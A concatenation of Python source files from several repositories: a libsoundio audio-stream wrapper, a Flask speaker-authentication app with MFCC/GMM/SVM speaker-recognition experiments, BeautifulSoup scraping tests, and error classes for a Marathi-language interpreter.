def supports_format(self, device, format):
"""
Check the format is supported by the selected device.
Parameters
----------
device: (SoundIoDevice) device object
format: (SoundIoFormat) see `Formats`_.
Returns
-------
(bool) True if the format is supported for this device
"""
return bool(_lib.soundio_device_supports_format(device, format))
def get_default_format(self, device):
"""
Get the best format value.
Parameters
----------
device: (SoundIoDevice) device object
Returns
------
(SoundIoFormat) The best available format
"""
dtype = _lib.SoundIoFormatInvalid
for fmt in constants.PRIORITISED_FORMATS:
if self.supports_format(device, fmt):
dtype = fmt
break
if dtype == _lib.SoundIoFormatInvalid:
raise PySoundIoError('Incompatible sample formats')
return dtype
def sort_channel_layouts(self, device):
"""
Sorts channel layouts by channel count, descending
Parameters
----------
device: (SoundIoDevice) device object
"""
_lib.soundio_device_sort_channel_layouts(device)
def _get_default_layout(self, channels):
"""
Get default builtin channel layout for the given number of channels
Parameters
----------
channel_count: (int) desired number of channels
"""
return _lib.soundio_channel_layout_get_default(channels)
def get_bytes_per_frame(self, format, channels):
"""
Get the number of bytes per frame
Parameters
----------
format: (SoundIoFormat) format
channels: (int) number of channels
Returns
-------
(int) number of bytes per frame
"""
return _lib.soundio_get_bytes_per_sample(format) * channels
def get_bytes_per_sample(self, format):
"""
Get the number of bytes per sample
Parameters
----------
format: (SoundIoFormat) format
Returns
-------
(int) number of bytes per sample
"""
return _lib.soundio_get_bytes_per_sample(format)
def get_bytes_per_second(self, format, channels, sample_rate):
"""
Get the number of bytes per second
Parameters
----------
format: (SoundIoFormat) format
channels (int) number of channels
sample_rate (int) sample rate
Returns
-------
(int) number of bytes per second
"""
return self.get_bytes_per_frame(format, channels) * sample_rate
def _create_input_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.input['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.input['buffer']
def _create_output_ring_buffer(self, capacity):
"""
Creates ring buffer with the capacity to hold 30 seconds of data,
by default.
"""
self.output['buffer'] = _lib.soundio_ring_buffer_create(self._soundio, capacity)
return self.output['buffer']
def _create_input_stream(self):
"""
Allocates memory and sets defaults for input stream
"""
self.input['stream'] = _lib.soundio_instream_create(self.input['device'])
if not self.input['stream']:
raise PySoundIoError('Out of memory')
self.input['stream'].userdata = self._userdata
self.input['stream'].read_callback = _lib._read_callback
self.input['stream'].overflow_callback = _lib._overflow_callback
self.input['stream'].error_callback = _lib._input_error_callback
layout = self._get_default_layout(self.input['channels'])
if layout:
self.input['stream'].layout = layout[0]
else:
raise RuntimeError('Failed to find a channel layout for %d channels' % self.input['channels'])
self.input['stream'].format = self.input['format']
self.input['stream'].sample_rate = self.input['sample_rate']
if self.input['block_size']:
self.input['stream'].software_latency = float(self.input['block_size']) / self.input['sample_rate']
return self.input['stream']
def _open_input_stream(self):
"""
Open an input stream.
"""
self._check(_lib.soundio_instream_open(self.input['stream']))
def _start_input_stream(self):
"""
Start an input stream running.
"""
self._check(_lib.soundio_instream_start(self.input['stream']))
def pause_input_stream(self, pause):
"""
Pause input stream
Parameters
----------
pause: (bool) True to pause, False to unpause
"""
self._check(_lib.soundio_instream_pause(self.input['stream'], pause))
def get_input_latency(self, out_latency):
"""
Obtain the number of seconds that the next frame of sound
being captured will take to arrive in the buffer,
plus the amount of time that is represented in the buffer.
Parameters
----------
out_latency: (float) output latency in seconds
"""
c_latency = _ffi.new('double *', out_latency)
return _lib.soundio_instream_get_latency(self.input['stream'], c_latency)
def start_input_stream(self, device_id=None,
sample_rate=None, dtype=None,
block_size=None, channels=None,
read_callback=None, overflow_callback=None):
"""
Creates input stream, and sets parameters. Then allocates
a ring buffer and starts the stream.
The read callback is called in an audio processing thread,
when a block of data is read from the microphone. Data is
passed from the ring buffer to the callback to process.
Parameters
----------
device_id: (int) input device id
sample_rate: (int) desired sample rate (optional)
dtype: (SoundIoFormat) desired format, see `Formats`_. (optional)
block_size: (int) desired block size (optional)
channels: (int) number of channels [1: mono, 2: stereo] (optional)
read_callback: (fn) function to call with data, the function must have
the arguments data and length. See record example
overflow_callback: (fn) function to call if data is not being read fast enough
Raises
------
PySoundIoError if any invalid parameters are used
Notes
-----
An example read callback
.. code-block:: python
:linenos:
# Note: `length` is the number of samples per channel
def read_callback(data: bytearray, length: int):
wav.write(data)
Overflow callback example
.. code-block:: python
:linenos:
def overflow_callback():
print('buffer overflow')
"""
self.input['sample_rate'] = sample_rate
self.input['format'] = dtype
self.input['block_size'] = block_size
self.input['channels'] = channels
self.input['read_callback'] = read_callback
self.input['overflow_callback'] = overflow_callback
if device_id is not None:
self.input['device'] = self.get_input_device(device_id)
else:
self.input['device'] = self.get_default_input_device()
self.logger.info('Input Device: %s' % _ffi.string(self.input['device'].name).decode())
self.sort_channel_layouts(self.input['device'])
if self.input['sample_rate']:
if not self.supports_sample_rate(self.input['device'], self.input['sample_rate']):
raise PySoundIoError('Invalid sample rate: %d' % self.input['sample_rate'])
else:
self.input['sample_rate'] = self.get_default_sample_rate(self.input['device'])
if self.input['format']:
if not self.supports_format(self.input['device'], self.input['format']):
raise PySoundIoError('Invalid format: %s interleaved' %
(_ffi.string(_lib.soundio_format_string(self.input['format'])).decode()))
else:
self.input['format'] = self.get_default_format(self.input['device'])
self._create_input_stream()
self._open_input_stream()
self.input['bytes_per_frame'] = self.get_bytes_per_frame(self.input['format'], channels)
capacity = int(constants.DEFAULT_RING_BUFFER_DURATION *
self.input['stream'].sample_rate * self.input['bytes_per_frame'])
self._create_input_ring_buffer(capacity)
if self.input['stream'].layout_error:
raise RuntimeError('Layout error')
layout_name = _ffi.string(self.input['stream'].layout.name).decode()
self.logger.info('Created input stream with a %s layout', layout_name)
self.input['thread'] = _InputProcessingThread(parent=self)
self._start_input_stream()
self.flush()
def _create_output_stream(self):
"""
Allocates memory and sets defaults for output stream
"""
self.output['stream'] = _lib.soundio_outstream_create(self.output['device'])
if not self.output['stream']:
raise PySoundIoError('Out of memory')
self.output['stream'].userdata = self._userdata
self.output['stream'].write_callback = _lib._write_callback
self.output['stream'].underflow_callback = _lib._underflow_callback
self.output['stream'].error_callback = _lib._output_error_callback
layout = self._get_default_layout(self.output['channels'])
if layout:
self.output['stream'].layout = layout[0]
else:
raise RuntimeError('Failed to find a channel layout for %d channels' % self.output['channels'])
self.output['stream'].format = self.output['format']
self.output['stream'].sample_rate = self.output['sample_rate']
if self.output['block_size']:
self.output['stream'].software_latency = float(self.output['block_size']) / self.output['sample_rate']
return self.output['stream']
def _open_output_stream(self):
"""
Open an output stream.
"""
self._check(_lib.soundio_outstream_open(self.output['stream']))
self.output['block_size'] = int(self.output['stream'].software_latency / self.output['sample_rate'])
def _start_output_stream(self):
"""
Start an output stream running.
"""
self._check(_lib.soundio_outstream_start(self.output['stream']))
def pause_output_stream(self, pause):
"""
Pause output stream
Parameters
----------
pause: (bool) True to pause, False to unpause
"""
self._check(_lib.soundio_outstream_pause(self.output['stream'], pause))
def _clear_output_buffer(self):
"""
Clear the output buffer
"""
if self.output['buffer']:
_lib.soundio_ring_buffer_clear(self.output['buffer'])
def get_output_latency(self, out_latency):
"""
Obtain the total number of seconds that the next frame written
will take to become audible.
Parameters
----------
out_latency: (float) output latency in seconds
"""
c_latency = _ffi.new('double *', out_latency)
return _lib.soundio_outstream_get_latency(self.output['stream'], c_latency)
def start_output_stream(self, device_id=None,
sample_rate=None, dtype=None,
block_size=None, channels=None,
write_callback=None, underflow_callback=None):
"""
Creates output stream, and sets parameters. Then allocates
a ring buffer and starts the stream.
The write callback is called in an audio processing thread,
when a block of data should be passed to the speakers. Data is
added to the ring buffer to process.
Parameters
----------
device_id: (int) output device id
sample_rate: (int) desired sample rate (optional)
dtype: (SoundIoFormat) desired format, see `Formats`_. (optional)
block_size: (int) desired block size (optional)
channels: (int) number of channels [1: mono, 2: stereo] (optional)
write_callback: (fn) function to call with data, the function must have
the arguments data and length.
underflow_callback: (fn) function to call if data is not being written fast enough
Raises
------
PySoundIoError if any invalid parameters are used
Notes
-----
An example write callback
.. code-block:: python
:linenos:
# Note: `length` is the number of samples per channel
def write_callback(data: bytearray, length: int):
outdata = ar.array('f', [0] * length)
for value in outdata:
outdata = 1.0
data[:] = outdata.tostring()
Underflow callback example
.. code-block:: python
:linenos:
def underflow_callback():
print('buffer underflow')
"""
self.output['sample_rate'] = sample_rate
self.output['format'] = dtype
self.output['block_size'] = block_size
self.output['channels'] = channels
self.output['write_callback'] = write_callback
self.output['underflow_callback'] = underflow_callback
if device_id is not None:
self.output['device'] = self.get_output_device(device_id)
else:
self.output['device'] = self.get_default_output_device()
self.logger.info('Input Device: %s' % _ffi.string(self.output['device'].name).decode())
self.sort_channel_layouts(self.output['device'])
if self.output['sample_rate']:
if not self.supports_sample_rate(self.output['device'], self.output['sample_rate']):
raise PySoundIoError('Invalid sample rate: %d' % self.output['sample_rate'])
else:
self.output['sample_rate'] = self.get_default_sample_rate(self.output['device'])
if self.output['format']:
if not self.supports_format(self.output['device'], self.output['format']):
raise PySoundIoError('Invalid format: %s interleaved' %
(_ffi.string(_lib.soundio_format_string(self.output['format'])).decode()))
else:
self.output['format'] = self.get_default_format(self.output['device'])
self._create_output_stream()
self._open_output_stream()
self.output['bytes_per_frame'] = self.get_bytes_per_frame(self.output['format'], channels)
capacity = int(constants.DEFAULT_RING_BUFFER_DURATION *
self.output['stream'].sample_rate * self.output['bytes_per_frame'])
self._create_output_ring_buffer(capacity)
self._clear_output_buffer()
if self.output['stream'].layout_error:
raise RuntimeError('Layout error')
layout_name = _ffi.string(self.output['stream'].layout.name).decode()
self.logger.info('Created output stream with a %s layout', layout_name)
self.output['thread'] = _OutputProcessingThread(parent=self)
self._start_output_stream()
self.flush()
@_ffi.def_extern()
def _write_callback(output_stream,
frame_count_min,
frame_count_max):
"""
Called internally when the output requires some data
"""
self = _ffi.from_handle(output_stream.userdata)
frame_count = 0
read_ptr = _lib.soundio_ring_buffer_read_ptr(self.output['buffer'])
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.output['buffer'])
fill_count = fill_bytes / output_stream.bytes_per_frame
read_count = min(frame_count_max, fill_count)
frames_left = read_count
if frame_count_min > fill_count:
frames_left = frame_count_min
while frames_left > 0:
frame_count = frames_left
if frame_count <= 0:
return
frame_count_ptr = _ffi.new('int *', frame_count)
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_outstream_begin_write(output_stream,
areas_ptr,
frame_count_ptr)
)
if frame_count_ptr[0] <= 0:
return
num_bytes = output_stream.bytes_per_sample * output_stream.layout.channel_count * frame_count_ptr[0]
fill_bytes = bytearray(b'\x00' * num_bytes)
_ffi.memmove(areas_ptr[0][0].ptr, fill_bytes, num_bytes)
self._check(_lib.soundio_outstream_end_write(output_stream))
frames_left -= frame_count_ptr[0]
while frames_left > 0:
frame_count = int(frames_left)
frame_count_ptr = _ffi.new('int *', frame_count)
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_outstream_begin_write(output_stream, areas_ptr, frame_count_ptr)
)
if frame_count_ptr[0] <= 0:
break
num_bytes = output_stream.bytes_per_sample * output_stream.layout.channel_count * frame_count_ptr[0]
_ffi.memmove(areas_ptr[0][0].ptr, read_ptr, num_bytes)
read_ptr += num_bytes
self._check(_lib.soundio_outstream_end_write(output_stream))
frames_left -= frame_count_ptr[0]
_lib.soundio_ring_buffer_advance_read_ptr(
self.output['buffer'],
int(read_count * output_stream.bytes_per_frame)
)
with threading.Lock():
self.output['thread'].block_size = frame_count_max
self.output['thread'].to_read += 1
@_ffi.def_extern()
def _underflow_callback(output_stream):
"""
Called internally when the sound device runs out of
buffered audio data to play.
"""
logger = logging.getLogger(__name__)
logger.error('Output underflow')
self = _ffi.from_handle(output_stream.userdata)
if self.output['underflow_callback']:
self.output['underflow_callback']()
@_ffi.def_extern()
def _output_error_callback(output_stream,
error_code):
"""
Called internally when an error occurs in the
output stream.
"""
logger = logging.getLogger(__name__)
logger.error(_ffi.string(_lib.soundio_strerror(error_code)).decode())
@_ffi.def_extern()
def _read_callback(input_stream,
frame_count_min,
frame_count_max):
"""
Called internally when there is input data available.
"""
self = _ffi.from_handle(input_stream.userdata)
write_ptr = _lib.soundio_ring_buffer_write_ptr(self.input['buffer'])
free_bytes = _lib.soundio_ring_buffer_free_count(self.input['buffer'])
free_count = free_bytes / input_stream.bytes_per_frame
if free_count < frame_count_min:
logger = logging.getLogger(__name__)
logger.critical('Ring buffer overflow')
write_frames = min(free_count, frame_count_max)
frames_left = write_frames
while True:
frame_count = frames_left
frame_count_ptr = _ffi.new('int *', int(frame_count))
areas_ptr = _ffi.new('struct SoundIoChannelArea **')
self._check(
_lib.soundio_instream_begin_read(input_stream,
areas_ptr,
frame_count_ptr)
)
if not frame_count_ptr[0]:
break
if not areas_ptr[0]:
# Due to an overflow there is a hole.
# Fill the ring buffer with silence for the size of the hole.
fill = bytearray(b'\x00' * frame_count_ptr[0] * input_stream.bytes_per_frame)
_ffi.memmove(write_ptr, fill, len(fill))
else:
num_bytes = input_stream.bytes_per_sample * input_stream.layout.channel_count * frame_count_ptr[0]
_ffi.memmove(write_ptr, areas_ptr[0][0].ptr, num_bytes)
write_ptr += num_bytes
self._check(_lib.soundio_instream_end_read(input_stream))
frames_left -= frame_count_ptr[0]
if frames_left <= 0:
break
advance_bytes = int(write_frames * input_stream.bytes_per_frame)
_lib.soundio_ring_buffer_advance_write_ptr(self.input['buffer'], advance_bytes)
@_ffi.def_extern()
def _overflow_callback(input_stream):
"""
Called internally when the sound device buffer is full,
yet there is more captured audio to put in it.
"""
logger = logging.getLogger(__name__)
logger.error('Input overflow')
self = _ffi.from_handle(input_stream.userdata)
if self.input['overflow_callback']:
self.input['overflow_callback']()
@_ffi.def_extern()
def _input_error_callback(input_stream,
error_code):
"""
Called internally when an error occurs in the
input stream.
"""
logger = logging.getLogger(__name__)
logger.error(_ffi.string(_lib.soundio_strerror(error_code)).decode())
``` |
{
"source": "joexu01/speak_auth",
"score": 3
} |
#### File: speak_auth/app/assist_func.py
```python
import random
import time
# 生成随机字符串
def random_string(length=32):
base_str = 'qwertyuiopasdfghjklzxcvbnm0123456789'
return ''.join(random.choice(base_str) for i in range(length))
def random_dtw_number(length=6):
base_str = '0123456789'
return ''.join(random.choice(base_str) for i in range(length))
# 生成时间字符串
def time_string():
return time.asctime(time.localtime(time.time()))
```
#### File: Project/speak_auth/speak_auth.py
```python
import os
# FLASK 及与 FLASk 有关的第三方库
from flask_migrate import Migrate
# 本地FLASK
from app import create_app, db
from app.models import User, Role, Person, LoginRecord
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
migrate = Migrate(app, db)
@app.shell_context_processor
def make_shell_context():
""" Shell 字典"""
return dict(db=db, User=User, Role=Role, Person=Person, LoginRecord=LoginRecord)
@app.cli.command()
def test():
"""Run the unit tests."""
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8001)
```
#### File: Test Code/speak_reg/GMM_01.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import matplotlib.pyplot as plt
import numpy as np
from sklearn.model_selection import cross_val_score
import io
from sklearn.mixture import gaussian_mixture
my_dir = ['A','B','C','D']
my_file = ['1.wav','2.wav','3.wav','4.wav','5.wav','6.wav','7.wav','8.wav','9.wav','10.wav','11.wav','12.wav','13.wav','14.wav','15.wav','16.wav']
def init_data(x):
A = np.zeros(shape=(x, 1))
B = np.zeros(shape=(x, 1))
C = np.zeros(shape=(x, 1))
D = np.zeros(shape=(x, 1))
return A, B, C, D
A = np.zeros(shape=(13, 1))
B = np.zeros(shape=(13, 1))
C = np.zeros(shape=(13, 1))
D = np.zeros(shape=(13, 1))
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/A/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
A = np.hstack((A, f))
A = A[:, 1:].T
print(A.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/B/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
B = np.hstack((B, f))
B = B[:, 1:].T
print(B.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/C/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
C = np.hstack((C, f))
C = C[:, 1:].T
print(C.shape)
for ffile in my_file:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/train/D/" + ffile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
D = np.hstack((D, f))
D = D[:, 1:].T
print(D.shape)
A = A[:1000, ]
# np.savetxt('test01.csv', A, delimiter=',')
B = B[:1000, ]
C = C[:1000, ]
D = D[:1000, ]
# 取前1000个数据准备第一轮洗牌
shuffle_index_step1 = np.random.permutation(1000)
A = A[shuffle_index_step1]
B = B[shuffle_index_step1]
C = C[shuffle_index_step1]
D = D[shuffle_index_step1]
# REST = np.vstack((B,C,D))
# 再取洗牌后的前n_learn个数据进行学习
n_learn = 650
A = A[:n_learn, ]
# REST = REST[:1950, ]
B = B[:n_learn, ]
C = C[:n_learn, ]
D = D[:n_learn, ]
data_set = np.vstack((A,B,C,D))
data = np.mat(data_set)
A_y = np.empty(n_learn, dtype=int)
A_y = np.full(A_y.shape, 1)
B_y = np.empty(n_learn, dtype=int)
B_y = np.full(B_y.shape, 2)
C_y = np.empty(n_learn, dtype=int)
C_y = np.full(C_y.shape, 3)
D_y = np.empty(n_learn, dtype=int)
D_y = np.full(D_y.shape, 4)
label_set = np.hstack((A_y,B_y,C_y,D_y))
label = np.array(label_set)
clf = gaussian_mixture.GaussianMixture(n_components=4, covariance_type='full')
clf.fit(data, label)
# 预测
my_fflile = ['1.wav','2.wav','3.wav','4.wav']
for mydir in my_dir:
print(mydir + '\n')
for myfile in my_fflile:
[Fs, x] = audioBasicIO.readAudioFile("/home/joexu01/PycharmProjects/speak_reg/data/test/" +
mydir + "/" + myfile)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ].T
result = clf.predict(f)
counter = f.shape[0]
counter1 = counter2 = counter3 = counter4 = 0
for i in range(0, counter):
if result[i] == 1:
counter1 += 1
if result[i] == 2:
counter2 += 1
if result[i] == 3:
counter3 += 1
if result[i] == 4:
counter4 += 1
print(counter1, ',', counter2, ',', counter3, ',', counter4, '\n')
```
#### File: Test Code/speak_reg/one_user_rec.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import matplotlib.pyplot as plt
import numpy as np
from sklearn import mixture
from sklearn import svm
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score
from sklearn.mixture import GaussianMixture
import os
RATE = float(0.75)
# 提取特征
my_file = ['1.wav', '2.wav', '3.wav', '4.wav', '5.wav', '6.wav', '7.wav', '8.wav']
person = '12'
data_matrix = []
label_matrix = []
for file in my_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/train/" + person + '/' + file)
F = audioFeatureExtraction.stFeatureExtraction_modified(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ]
f = f.T
data_matrix.append(f)
label = np.empty(f.shape[0], dtype=int)
label = np.full(label.shape, int(person))
label_matrix.append(label)
data_matrix = np.concatenate(data_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
print(data_matrix.shape)
print(label_matrix.shape)
# clf_svm = svm.SVC(gamma='scale', decision_function_shape='ovo')
# clf_svm.fit(data_matrix, label_matrix)
gmm = GaussianMixture(n_components=1, covariance_type='full')
gmm.fit(data_matrix, label_matrix)
def max_list(lt):
temp = 0
for i in lt:
if lt.count(i) > temp:
max_str = i
temp = lt.count(i)
return str(max_str)
# lt->list, lb->label
def calculate_rate(lt, total, lb):
counter = 0
for item in lt:
if item == lb:
counter += 1
return float(counter / total)
# 预测
pre_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
pre_file = ['1.wav', '2.wav']
# result_str = ''
for p_dir in pre_dir:
print(p_dir + ': '),
for p_file in pre_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/test/" + p_dir + '/' + p_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 0.050 * Fs, 0.025 * Fs)
f = F[8:21, ].T
result = gmm.predict(f)
# if calculate_rate(result.tolist(), float(result.shape[0]), p_dir) >= RATE:
# print('Yes '),
# else:
# print('No'),
print(result)
```
#### File: Test Code/speak_reg/speak_reg02.py
```python
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
import numpy as np
from sklearn.mixture import GaussianMixture
from sklearn.ensemble import RandomForestClassifier
my_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
my_file = ['1.wav','2.wav','3.wav','4.wav','5.wav','6.wav','7.wav','8.wav']
data_matrix = []
label_matrix = []
n = 0
n = int(n)
for f_dir in my_dir:
n += 1
for f_file in my_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/train/" + f_dir + "/" + f_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 256, 80)
f = F[8:21, ]
f = f.T
data_matrix.append(f)
label = np.empty(f.shape[0], dtype=int)
label = np.full(label.shape, n)
label_matrix.append(label)
data_matrix = np.concatenate(data_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
print(data_matrix.shape)
print(label_matrix.shape)
# gmm = GaussianMixture(n_components=4, covariance_type='full')
# gmm.fit(data_matrix, label_matrix)
# rfc = RandomForestClassifier(n_estimators=200, max_depth=4, random_state=0)
# rfc.fit(data_matrix, label_matrix)
# 预测
def max_list(lt):
temp = 0
for i in lt:
if lt.count(i) > temp:
max_str = i
temp = lt.count(i)
return str(max_str)
pre_dir = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19',
'20', '21', '22']
pre_file = ['1.wav', '2.wav']
counter = current = 0
result_matrix = []
for p_dir in pre_dir:
# current += 1
result_matrix.append(p_dir)
result_matrix.append(':')
for p_file in pre_file:
[Fs, x] = audioBasicIO.readAudioFile("D:/ML/speak_reg/spk_rec_data/test/" + p_dir + '/' + p_file)
F = audioFeatureExtraction.stFeatureExtraction(x, Fs, 256, 80)
f = F[8:21, ].T
result = rfc.predict(f)
result_in = result.tolist()
result_matrix.append(max_list(result_in))
print(result_matrix)
```
#### File: Test Code/speak_reg/test03.py
```python
import numpy as np
from pyAudioAnalysis import audioBasicIO
from pyAudioAnalysis import audioFeatureExtraction
from sklearn import svm
from os import listdir
from random import sample
def load_from_other_csvs_refreshed(file_dir, current_filename, tag):
"""
:param file_dir: 存放 mfcc 参数的csv 文件的路径
:param current_filename: 当前用户的 mfcc 参数的csv 文件名
:param tag: 标记其他用户数据为0
:return: 返回其他用户的 mfcc 参数矩阵,以及用做标记的标签列表
"""
all_files = listdir(file_dir) # 将所有文件名存入一个 list
all_files = sample(all_files, 16) # 随机提取6个文件名
if current_filename in all_files:
all_files.remove(current_filename) # 如果当前用户的mfcc文件在list中,就把它从list中删除
else:
del all_files[-1] # 否则删除列表中最后一个文件名,确保提取出来的是5个人的mfcc参数
mfccs_matrix = []
label_matrix = []
for file in all_files:
mfccs = np.loadtxt(file_dir + '/' + file, delimiter=',') # 加载csv文件
mfccs_matrix.append(mfccs)
label = np.empty(mfccs.shape[0], dtype=int)
label = np.full(label.shape, int(tag))
label_matrix.append(label)
mfccs_matrix = np.concatenate(mfccs_matrix, 0)
label_matrix = np.concatenate(label_matrix, 0)
# 最后对五个数据进行洗牌,确保每个人的数据都混杂在一起
# mfccs_matrix = np.random.permutation(mfccs_matrix)
print(mfccs_matrix.shape, label_matrix.shape)
return mfccs_matrix, label_matrix
def mfcc_auth(data_matrix, label_matrix, predict_matrix):
clf_svm = svm.SVC(gamma='scale', decision_function_shape='ovo')
clf_svm.fit(data_matrix, label_matrix)
result = clf_svm.predict(predict_matrix).tolist()
print(result)
counter = 0
for each in result:
if each == 1:
counter += 1
percentage = counter / len(result)
print(percentage)
if percentage >= 0.50:
return True
else:
return False
def load_mfccs_from_csv(csv_path, tag):
mfccs = np.loadtxt(csv_path, delimiter=',')
label = np.empty(mfccs.shape[0], dtype=int)
label = np.full(label.shape, tag)
return mfccs, label
def extract_mfcc_not_threading(audio_path):
[Fs, x] = audioBasicIO.readAudioFile(audio_path)
F = audioFeatureExtraction.stFeatureExtraction_modified_2nd_edition(x, Fs, 256, 80)
mfccs = F.T
return mfccs
test_data = extract_mfcc_not_threading('D:/AudioProcessing/test.wav') # 测试数据集
train_data_1 = extract_mfcc_not_threading('D:/AudioProcessing/train.wav') # 训练数据集
label_1 = np.empty(train_data_1.shape[0], dtype=int)
label_1 = np.full(train_data_1.shape, 1)
``` |
{
"source": "joexu22/BamaWebScraper",
"score": 3
} |
#### File: BeautifulSoupCode/test/test_scraping_3.py
```python
import unittest
from bs4 import BeautifulSoup
from pathlib import Path
class TestBeautifulSoup(unittest.TestCase):
def test_find(self):
path = Path(__file__).parent / "../html_folder/ecological_pyramid.html"
with open(path) as ecological_pyramid:
soup = BeautifulSoup(ecological_pyramid, 'html.parser')
# finding the first item in an "unordered list"
producer_entries = soup.find('ul')
self.assertEqual(str(producer_entries.li.div.string), 'plants')
# find() method in BeautifulSoup
# find(name,attrs,recursive,text,**kwargs)
# finding soup.find(name = "li")
tag_li = soup.find("li")
self.assertEqual(str(type(tag_li)), "<class 'bs4.element.Tag'>")
# searching for text in soup object
search_for_stringonly = soup.find(text="fox")
self.assertEqual(str(search_for_stringonly), 'fox')
# note about being case sensitive
case_sensitive_string = soup.find(text="Fox")
# will return None
self.assertEqual(case_sensitive_string, None)
self.assertNotEqual(str(case_sensitive_string), 'Fox')
if __name__ == '__main__':
unittest.main()
```
#### File: BeautifulSoupCode/test/test_scraping_5.py
```python
import unittest
from bs4 import BeautifulSoup
from pathlib import Path
class TestBeautifulSoup(unittest.TestCase):
def test_soup_functions(self):
path = Path(__file__).parent / "../html_folder/ecological_pyramid.html"
with open(path) as ecological_pyramid:
soup = BeautifulSoup(ecological_pyramid, 'html.parser')
# finding the first "primary consumer" in the list
primary_consumers = soup.find(id="primaryconsumers")
self.assertEqual(str(primary_consumers.li.div.string), 'deer')
# using functions with soup
# the function does not seem to need any parameters passed to it
def is_secondary_consumer(tag):
return tag.has_attr('id') and tag.get('id') == 'secondaryconsumers'
secondary_consumer = soup.find(is_secondary_consumer)
#print(type(secondary_consumer))
self.assertEqual(str(secondary_consumer.li.div.string), 'fox')
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "joey00072/Marathi-Programing-Language",
"score": 3
} |
#### File: Marathi-Programing-Language/Errors/base_error.py
```python
class Error:
def __init__(self, error_name, pos_start, pos_end, details):
self.pos_start = pos_start
self.pos_end = pos_end
self.error_name = error_name
self.details = details
def as_string(self):
result = f"{self.error_name} : {self.details} \n"
result += f"File {self.pos_start.fn}, line {self.pos_start.ln+1}"
result += "\n\n" + self.string_with_arrows(
self.pos_start.ftxt, self.pos_start, self.pos_end
)
return result
def string_with_arrows(self, text, pos_start, pos_end):
result = ""
# Calculate indices
idx_start = max(text.rfind("\n", 0, pos_start.idx), 0)
idx_end = text.find("\n", idx_start + 1)
if idx_end < 0:
idx_end = len(text)
# Generate each line
line_count = pos_end.ln - pos_start.ln + 1
for i in range(line_count):
# Calculate line columns
line = text[idx_start:idx_end]
col_start = pos_start.col if i == 0 else 0
col_end = pos_end.col if i == line_count - 1 else len(line) - 1
# Append to result
result += line + "\n"
result += " " * col_start + "^" * (col_end - col_start)
# Re-calculate indices
idx_start = idx_end
idx_end = text.find("\n", idx_start + 1)
if idx_end < 0:
idx_end = len(text)
return result.replace("\t", "")
```
#### File: Marathi-Programing-Language/Errors/errors.py
```python
from Errors.base_error import Error
class IllegalCharacterError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__(
"चुकीचे अक्षर (Illegal Character)", pos_start, pos_end, details
)
class InvalidSyntaxError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__("अवैध वाक्यरचना (InvalidSyntax)", pos_start, pos_end, details)
class ExpectedCharError(Error):
def __init__(self, pos_start, pos_end, details):
super().__init__("अपेक्षित अक्षर (Expected Character)", pos_start, pos_end, details)
class RTError(Error):
def __init__(self, pos_start, pos_end, details, context):
super().__init__("प्रोग्राम चालू असताना त्रुटी आली (Runtime Error)", pos_start, pos_end, details)
self.context = context
def as_string(self):
result = self.generate_traceback()
result += f"{self.error_name}: {self.details}"
result += "\n\n" + self.string_with_arrows(
self.pos_start.ftxt, self.pos_start, self.pos_end
)
return result
def generate_traceback(self):
result = ""
pos = self.pos_start
ctx = self.context
while ctx:
result = (
f" File {pos.fn}, line {str(pos.ln + 1)}, in {ctx.display_name}\n"
+ result
)
pos = ctx.parent_entry_pos
ctx = ctx.parent
return "त्रुटी मागोवा (Traceback (most recent call last)):\n" + result
```
#### File: joey00072/Marathi-Programing-Language/main.py
```python
from Lexer import Lexer
